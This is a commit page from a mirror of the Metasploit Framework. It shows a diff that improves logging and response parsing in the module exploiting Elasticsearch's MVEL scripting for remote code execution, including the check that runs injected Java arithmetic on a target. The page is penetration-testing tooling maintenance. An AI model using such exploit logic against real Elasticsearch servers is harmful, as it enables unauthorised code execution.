infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4537, @wchen-r7's fix for #4098

bug/bundler_fix
Jon Hart 2015-01-08 17:57:16 -08:00
parent e4cdac1440 f13e56aef8
commit e4547eb474
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 14 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/exploits/multi/elasticsearch/script_mvel_rce.rb
View File

@ -105,18 +105,28 @@ class Metasploit3 < Msf::Exploit::Remote
sum = addend_one + addend_two sum = addend_one + addend_two
java = java_sum([addend_one, addend_two]) java = java_sum([addend_one, addend_two])
vprint_status("#{peer} attempting to execute '#{java}' in Java")
res = execute(java) res = execute(java)
result = parse_result(res) result = parse_result(res)
if result.nil? if result.nil?
vprint_status("#{peer} no response to executed Java")
return false return false
else else
vprint_status("#{peer} response to executed Java: #{result}")
result.to_i == sum result.to_i == sum
end end
end end
def parse_result(res) def parse_result(res)
unless res && res.code == 200 && res.body unless res
vprint_error("#{peer} no response")
return nil
end
unless res.code == 200 && res.body
vprint_error("#{peer} responded with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
return nil return nil
end end
@ -127,20 +137,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
begin begin
result = json['hits']['hits'][0]['fields']['msf_result'][0] result = json['hits']['hits'][0]['fields']['msf_result']
rescue rescue
return nil return nil
end end
result result.is_a?(::Array) ? result.first : result
end end
def java_sum(summands) def java_sum(summands)
source = <<-EOF summands.join(' + ')
#{summands.join(" + ")}
EOF
source
end end
def to_java_byte_array(str) def to_java_byte_array(str)